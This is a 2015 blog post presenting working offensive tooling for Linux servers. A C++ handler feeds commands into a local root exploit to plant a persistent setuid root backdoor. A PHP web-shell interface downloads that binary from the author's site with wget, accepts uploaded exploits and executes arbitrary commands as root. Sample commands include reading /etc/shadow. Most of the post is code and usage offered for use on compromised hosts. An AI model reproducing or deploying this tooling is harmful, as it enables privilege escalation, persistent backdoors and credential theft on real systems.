[PHP][C++] Root Exploiter (Part 2) – No Back-Connect

MakMan • September 29, 2015

php exploits

This post has the same goals as of the previous one i.e. to get root access on the target machine with just a PHP interface and no back-connect or reverse connection. So, if you haven't already, read the part 1 of this post here [PHP][Python] Root Exploiter – No Back-Connect.

In the previous version of this article, I used subprocess, pipes, popen and pexpect in Python to interact with another exploit. This time, I'm going to show a rather simpler approach to interact with another program or executable without loosing the session (prompt) on the run time via simple PHP interface.

I'm going to use a binary executable coded in C++ to act as a handler to our exploit and also a persistent back-door to a privileged user root account. Here's a detailed demo of the whole process.

Here's the C++ code of the executable and it's quite self explanatory.

#include <iostream>
#include <string.h>
#include <getopt.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

using namespace std;

int main(int argc, char** arg);
int exec_command(char const action[], char const* cmd);
void banner();
void menu(char arg[]);

void banner()
{
    cout << endl
         << "By MakMan -- //mukarramkhalid.com" << endl;
}

void menu(char arg[])
{
    cout << "Expected arguments as : " << arg << " [OPTIONS]" << endl;
    cout << "--  Execute your local root exploit" << endl;
    cout << "        --exploit = Exploit Name Here OR --e = Exploit Name Here" << endl;
    cout << "--  To execute command as root user." << endl;
    cout << "        --command = Command Here OR --c = Command Here" << endl;
    cout << "--  To print this menu." << endl;
    cout << "        --help OR --h To print this menu" << endl;
}

int exec_command(char const action[], char const* cmd)
{
    FILE* fp;
    char path[1035];
    char const* root_backdoor;
    root_backdoor = "chown root makman;chmod u+s makman;whoami;id\n";

    if (action == "e") {
        fp = popen(cmd, "w");
        fwrite("whoami;", 1, 8, fp);
        fwrite(root_backdoor, 1, strlen(root_backdoor), fp);
    }

    else if (action == "c") {
        fp = popen(cmd, "r");
    }

    if (fp == NULL) {
        cout << "Failed to run" << endl;
        return 0;
    }

    while (fgets(path, sizeof(path) - 1, fp) != NULL) {
        cout << path << endl;
    }

    pclose(fp);

    return 1;
}

int main(int argc, char** argv)

{
    banner();
    char const *exploit = "none", *command = "none";

    if (argc <= 1) {
        menu(argv[0]);
    }

    int c;
    const char short_opt[] = "he:c:";
    struct option long_opt[] = {
        { "help", no_argument, NULL, 'h' },
        { "exploit", required_argument, NULL, 'e' },
        { "command", required_argument, NULL, 'c' },
        { NULL, 0, NULL, 0 }
    };

    while ((c = getopt_long(argc, argv, short_opt, long_opt, NULL)) != -1) {
        switch (c) {
        case -1:
        case 0:
            break;

        case 'e':
            exploit = optarg;
            break;

        case 'c':
            command = optarg;
            break;

        case 'h':
            menu(argv[0]);
            return (0);

        default:
            menu(argv[0]);
            return (0);
        };
    };

    setuid(0);

    if (exploit != "none" && command == "none") {
        exec_command("e", exploit);
    }
    else if (exploit == "none" && command != "none") {
        exec_command("c", command);
    }

    return 0;
}

This code can be compiled by using the g++ compiler or you can download the pre compiled executable from Here. This binary executable can be used directly via any PHP shell. For example, to run your local root exploit, you can simply do:

./makman --exploit="./Name_of_the_exploit_here"

Execution from web shell

If the exploit is successful, the file permissions of the handler makman will be changed to 4755 with root as the owner which means that the UID bit of this file is set. Now you can run your commands as a root user.

./makman --command="whoami"

#OR

./makman --command="cat /etc/shadow"

Execution from web shell

I have also coded a PHP interface to automate this whole process just like the previous version.

<?php
/*
-- By MakMan
-- http://www.mukarramkhalid.com
-- https://www.facebook.com/makmaniac
-- https://twitter.com/themakmaniac
*/

ini_set('error_reporting', 0);
ini_set('max_execution_time', 0);

$handle_url     = "https://mukarramkhalid.com/assets/files/php-c-root-exploiter-part-2-no-back-connect/makman";
$path           = getcwd()."/";
$cmd            = ( isset( $_POST["cmd"] ) ? $_POST["cmd"] : '' );
$exploit        = ( isset( $_POST["check_exploit"] ) ? $_FILES["exploit"]["name"] : '' );

?>

<!doctype html>
<html>
<head>
    <meta charset='utf-8'>
    <title>MakMan - Root Exploiter - 2</title>
    <style type='text/css'>
    body
    {
        font:                 normal 15px Verdana;
        color:                #ffffff;
        background-color:     #000000;
    }
    textarea
    {
        width:                100%;
        height:               300px;
        resize:               none;
        overflow-y:           scroll;
    }
    pre
    {
        text-align:           center;
    }
    a
    {
        text-decoration:      none;
        color:                #ff0000;
    }
    a:hover
    {
        text-decoration:      underline;
        color:                #ff0000;
    }
    .green
    {
        font:                  normal 15px Verdana;
        color:                 #00ff00;
        text-align:            center;
    }
    .red
    {
        font:                  normal 15px Verdana;
        color:                 #ff0000;
        text-align:            center;
    }
    </style>
</head>
<body>
<pre>
+-+-+-+-+-+ +-+-+-+-+ +-+-+-+-+-+-+-+-+-+    +-+-+
|L|o|c|a|l| |R|o|o|t| |E|x|p|l|o|i|t|e|r| -- | 2 |
+-+-+-+-+-+ +-+-+-+-+ +-+-+-+-+-+-+-+-+-+    +-+-+
</pre>
<h1 class='red'>By <a href='//mukarramkhalid.com'>MakMan</a></h1>
<pre>
----------------------------------------------------------------------
</pre>
<?php

    ################################      MAKMAN_FUNCTIONS     #################################

    function check_os(  ) {
        if ( strtoupper( substr( PHP_OS, 0, 3 ) ) === "WIN" ) {
            exit( "<p class='red'>Only works on Linux</p></body></html>" );
        }    
    }

    function format_output( $out ) {
        foreach( $out as $o ) {
            echo htmlspecialchars( preg_replace( "/\x1b\[[0-9;]*m/", "", trim( $o ) ) )."\n";
        }
    }

    function check_session(  ) {

        global $path;

        clearstatcache(  );
        if( fileowner( $path."makman" ) == 0 && file_exists( $path."makman" ) && filesize( $path."makman" ) != 0 && decoct( fileperms( $path."makman" ) ) == 104755 ) {
            return true;
        }
        else {
            return false;
        }
    }

    function download_module(  ) {

        global $path, $handle_url;

        if( !file_exists( $path."makman" ) || filesize( $path."makman" ) == 0 ) {
            exec( "wget ".$handle_url." -O ".$path."makman" );
            chmod( $path."makman", 0755 );
            if( !file_exists( $path."makman" ) || filesize( $path."makman" ) == 0 ) {
                return false;
            }
            else {
                return true;
            }
        }
        return true;
    }

    function execute($action, $exp) {

        global $path, $handle_url;

        if(download_module()) {
            if( $action == "exploit" ) {
                if( move_uploaded_file( $_FILES["exploit"]["tmp_name"], $path.$exp ) ) {
                    chmod( $path.$exp, 0755 );
                    exec( $path."makman --exploit='".$path.$exp."'", $output );
                    format_output( $output );
                }
                else {
                    echo "Failed to Upload. Check the path ".$path." and set proper permissions.";
                }
            }
            else if ($action == "command") {
                exec( $path."makman --command='".$exp."'", $output );
                format_output($output);
            }
        }
        else {
            echo "Failed to download the handler from ".$handle_url.". Download it manually and save it here ".$path."makman with 'chmod +x'.";
        }
    }


    ################################      MAKMAN_MAIN     #########################################

    check_os(  );

    if( check_session(  ) ) {

        echo "<p class='green'>Root session exists. Insert commands to execute.</p>";
        echo "<textarea>";
        if( isset( $_POST["cmd"] ) ) {
            execute( "command", $cmd );
        }
        echo "</textarea>";
        echo "
                <center>
                <form method='POST' action=''>
                <input name='cmd' type='text' autofocus><br>
                <input name='Submit' value='Submit' type='submit'><br>
                </form>
                </center>
            ";

    }

    else {

        if( isset( $_POST["check_exploit"] ) ) {
            echo "<textarea>";
            execute( "exploit", $exploit );
            echo "\nRefreshing page in 2 seconds.";
            echo "</textarea>";
            header( "Refresh:2" );
        }
        echo "<p class='red'>Session not found. Upload your local root exploit to execute.</p>";
        echo "
                <center>
                <form method='POST' action='' enctype='multipart/form-data'>
                <input name='check_exploit' type='hidden' value='1'>
                <input name='exploit' type='file'>
                <input name='Submit' value='Submit' type='submit'><br>
                </form>
                </center>
            ";

    }


?>


</body>
</html>

This is what it looks like.

PHP Interface

GitHub Repository